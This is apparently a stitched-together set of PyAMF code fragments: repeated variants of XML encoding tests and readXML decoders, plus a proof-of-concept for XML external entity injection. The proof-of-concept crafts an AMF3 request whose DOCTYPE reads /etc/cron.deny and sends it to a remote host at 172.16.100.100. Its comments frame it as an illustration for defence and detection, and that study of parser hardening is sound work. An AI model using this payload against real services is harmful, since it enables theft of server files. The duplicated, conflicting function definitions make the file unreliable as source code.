def test_xml_references(self):
    # Decode the same XML document twice: once from its inline encoding and
    # once from the three trailing bytes 0x07 0x00 0x00 (presumably an AMF0
    # reference marker followed by index 0 -- confirm against the decoder).
    # NOTE(review): only a benign document is exercised; nothing here checks
    # how readElement treats XML that carries a DOCTYPE or entity declarations.
    stream = self.buf
    stream.truncate(0)
    # 0x0f marker, 4-byte length (0x19 == 25 characters), then the XML text.
    stream.write(
        "\x0f\x00\x00\x00\x19<a><b>hello world</b></a>"
        "\x07\x00\x00"
    )
    stream.seek(0)

    # Both reads must serialise to the same document.
    for _ in range(2):
        expected = xml.tostring(xml.fromstring("<a><b>hello world</b></a>"))
        self.assertEqual(expected, xml.tostring(self.decoder.readElement()))
def test_xml_references(self):
    # Two consecutive reads from one buffer must yield the same XML: the
    # first comes from the inline document, the second from the trailing
    # 0x07 0x00 0x00 bytes (presumably a reference to object 0 -- confirm).
    # NOTE(review): the input is well-formed and free of DTDs; rejection of
    # DOCTYPE / entity declarations is not covered by this test.
    self.buf.truncate(0)
    self.buf.write(
        '\x0f\x00\x00\x00\x19<a><b>hello world</b></a>'
        '\x07\x00\x00'
    )
    self.buf.seek(0)

    expected = xml.tostring(xml.fromstring('<a><b>hello world</b></a>'))

    first = self.decoder.readElement()
    self.assertEqual(expected, xml.tostring(first))

    second = self.decoder.readElement()
    self.assertEqual(expected, xml.tostring(second))
def test_amf3_xml(self):
    # With use_amf3 enabled, check the framing bytes the encoder puts in
    # front of an XML element and that the payload follows unchanged.
    self.encoder.use_amf3 = True

    source = '<root><sections><section /><section /></sections></root>'
    # Normalise through the XML layer first so the final comparison is made
    # against that layer's own serialisation of the document.
    canonical = xml.tostring(xml.fromstring(source))

    encoded = self.encode(xml.fromstring(canonical))
    reader = util.BufferedByteStream(encoded)

    # 17 (0x11) then 11 (0x0b): presumably the "switch to AMF3" marker and
    # the AMF3 XML type marker -- confirm against the codec constants.
    self.assertEqual(reader.read_uchar(), 17)
    self.assertEqual(reader.read_uchar(), 11)
    # The next byte, with its low bit shifted out, must equal the number of
    # bytes still unread, i.e. it carries the payload length.
    self.assertEqual(reader.read_uchar() >> 1, reader.remaining())
    self.assertEqual(reader.read(), canonical)
def test_xml(self):
    # An XML element must encode as: 0x0f marker, 4-byte length
    # (0x19 == 25 == len(document)), then the document text itself.
    document = '<a><b>hello world</b></a>'
    element = xml.fromstring(document)
    expected = '\x0f\x00\x00\x00\x19' + document
    self.assertEncoded(element, expected)
def test_xml(self):
    # Byte-string variant: the encoded form is a five-byte header followed
    # by the document exactly as given.
    payload = b'<a><b>hello world</b></a>'
    # 0x0f type marker, then the length as four bytes (0x19 == 25).
    header = b'\x0f\x00\x00\x00\x19'
    self.assertEncoded(xml.fromstring(payload), header + payload)
def test_xml_references(self):
    # Encoding a list that holds the same element twice: the expected bytes
    # contain the full document two times, so no back-reference is expected
    # for the repeated element.
    document = '<a><b>hello world</b></a>'
    element = xml.fromstring(document)

    # One encoded element: 0x0f marker, 4-byte length (0x19), document text.
    encoded_element = '\x0f\x00\x00\x00\x19' + document
    # List header: '\n' (0x0a) marker followed by a 4-byte count of 2.
    expected = '\n\x00\x00\x00\x02' + encoded_element * 2

    self.assertEncoded([element, element], expected)
def test_xml_references(self):
    # Byte-string variant: the same element placed twice in a list must be
    # written out in full both times after the list header.
    payload = b'<a><b>hello world</b></a>'
    node = xml.fromstring(payload)
    pair = [node] * 2

    # 0x0a marker + 4-byte element count, then two complete XML encodings
    # (0x0f marker, 4-byte length 0x19, document bytes).
    list_header = b'\n\x00\x00\x00\x02'
    one_item = b'\x0f\x00\x00\x00\x19' + payload

    self.assertEncoded(pair, list_header + one_item * 2)
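def readXML(self):
    """
    Read an XML document from the stream and register it with the context.

    The text comes straight from the AMF stream, i.e. from whoever produced
    the message, so it must not be parsed with DTD processing or entity
    expansion left to the parser's defaults. The context's C{forbid_dtd} and
    C{forbid_entities} settings are passed through explicitly.

    NOTE(review): relies on the context exposing C{forbid_dtd} /
    C{forbid_entities} and on C{xml.fromstring} accepting them -- confirm for
    the version this file belongs to.

    @return: The parsed root element.
    """
    data = self.readLongString()

    # Untrusted input: apply the configured DTD / entity policy at parse time.
    root = xml.fromstring(
        data,
        forbid_dtd=self.context.forbid_dtd,
        forbid_entities=self.context.forbid_entities,
    )

    # Make the element available to later references in the same stream.
    self.context.addObject(root)

    return root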
def readXML(self):
    """
    Read an XML document from the stream.

    The long string taken from the stream is parsed with the context's
    C{forbid_dtd} and C{forbid_entities} settings, and the resulting root
    element is added to the context before being returned.

    @return: The parsed root element.
    """
    text = self.readLongString()
    ctx = self.context

    # Stream-supplied XML: the DTD / entity policy is taken from the context
    # rather than left to the parser's defaults.
    parse_policy = {
        'forbid_dtd': ctx.forbid_dtd,
        'forbid_entities': ctx.forbid_entities,
    }
    document = xml.fromstring(text, **parse_policy)

    ctx.addObject(document)
    return document
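def readXML(self):
    """
    Reads an xml object from the stream.

    The leading integer either refers to an object already held by the
    context (reference bit clear) or, with the reference bit set, carries the
    byte length of the inline XML text in its remaining bits.

    Inline XML is data supplied by the sender of the stream, so it is parsed
    with the context's C{forbid_dtd} / C{forbid_entities} settings instead of
    the parser's defaults.

    NOTE(review): relies on the context exposing C{forbid_dtd} /
    C{forbid_entities} and on C{xml.fromstring} accepting them -- confirm for
    the version this file belongs to.

    @return: An etree interface compatible object
    @see: L{xml.set_default_interface}
    """
    ref = self.readInteger(False)

    # Reference bit clear: the value indexes a previously decoded object.
    if ref & REFERENCE_BIT == 0:
        return self.context.getObject(ref >> 1)

    # Reference bit set: the remaining bits give the length of the XML text.
    xmlstring = self.stream.read(ref >> 1)

    # Untrusted input: apply the configured DTD / entity policy at parse time.
    x = xml.fromstring(
        xmlstring,
        forbid_dtd=self.context.forbid_dtd,
        forbid_entities=self.context.forbid_entities,
    )
    self.context.addObject(x)

    return x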
# Proof-of-concept from the page (Python 2 syntax): it assembles an AMF3
# request whose XML body is a DOCTYPE with external parameter entities and
# prints the resulting bytes. It illustrates why a decoder must not pass
# stream-supplied XML to a parser that processes DTDs or expands entities;
# the defence is to reject DTD / entity declarations at parse time (for
# example via forbid_dtd / forbid_entities style parser options).
# Detection: "<!DOCTYPE" or "<!ENTITY" inside an AMF request body, and
# unexpected outbound HTTP requests or local file reads by the decoding
# service, are the signals to look for.
from pyamf import xml
import requests
# Silences urllib3 warnings; requests is not otherwise used in this excerpt.
requests.packages.urllib3.disable_warnings()
# DOCTYPE declaring parameter entities that point at a local file and at a
# remote DTD. A parser that resolves them would disclose file content to the
# remote host, which is exactly what a hardened parser configuration refuses.
xxexml = '''<?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY % file SYSTEM "file:///etc/cron.deny"> <!ENTITY % remote SYSTEM "http://172.16.100.100/evil.xml"> %remote; %all; %send; ]>'''
# Entity definition text; not referenced again in this excerpt.
evil_xml = '''<!ENTITY % all "<!ENTITY % send SYSTEM 'http://172.16.100.100/report.php?file=%file;'>">'''
# Benign placeholder with the same length as xxexml (7 characters are the
# <a></a> tags), so the length field written by the encoder stays consistent
# with the content substituted further down.
xmlp = '<a>' + 'x' * (len(xxexml) - 7) + '</a>'
xmlObj = xml.fromstring(xmlp)
# The placeholder element is carried as the body of a command message.
amfReq = CommandMessage(operation=5, destination=u'', messageID=u'F9E40DCB-78E2-68AD-0BC9-A56F41399B88', body=xmlObj, clientId=None, headers={ 'DSID': u'nil', 'DSMessagingVersion': 1.0 })
envelope = pyamf.remoting.Envelope(amfVersion=3)
envelope["/%d" % 1] = pyamf.remoting.Request(u'null', [amfReq])
message = pyamf.remoting.encode(envelope)
msg = message.getvalue()
# The encoded bytes are edited after encoding: the placeholder text is
# replaced by the DOCTYPE document.
msg = msg.replace(xmlp, xxexml)
print 'payload: %r' % (msg)
def test_xmlstring(self):
    # Encoding the same element twice: the first pass writes the document
    # inline, the second pass is expected to shrink to a two-byte form.
    element = xml.fromstring('<a><b>hello world</b></a>')

    # 0x0b marker, then 0x33 -- its upper bits (0x33 >> 1 == 25) match the
    # document length, with the low bit set.
    first_pass = self.encode(element)
    self.assertEqual(first_pass, '\x0b\x33<a><b>hello world</b></a>')

    # 0x0b marker, then 0x00 -- presumably a reference to object 0 (low bit
    # clear); confirm against the encoder's reference handling.
    second_pass = self.encode(element)
    self.assertEqual(second_pass, '\x0b\x00')
def test_xml_references(self):
    # The same element appears twice in the list; the expected output holds
    # the complete XML encoding twice rather than a back-reference.
    text = "<a><b>hello world</b></a>"
    elem = xml.fromstring(text)
    items = [elem, elem]

    # List header ('\n' marker + 4-byte count of 2) followed by two copies of
    # the element encoding (0x0f marker, 4-byte length 0x19, document text).
    expected = "\n\x00\x00\x00\x02"
    expected += ("\x0f\x00\x00\x00\x19" + text) * 2

    self.assertEncoded(items, expected)
def test_xml(self):
    # A single XML element encodes as the 0x0f marker, a 4-byte length
    # (0x19 == 25 characters) and then the document text unchanged.
    text = "<a><b>hello world</b></a>"
    parsed = xml.fromstring(text)
    wire_form = "\x0f\x00\x00\x00\x19" + text
    self.assertEncoded(parsed, wire_form)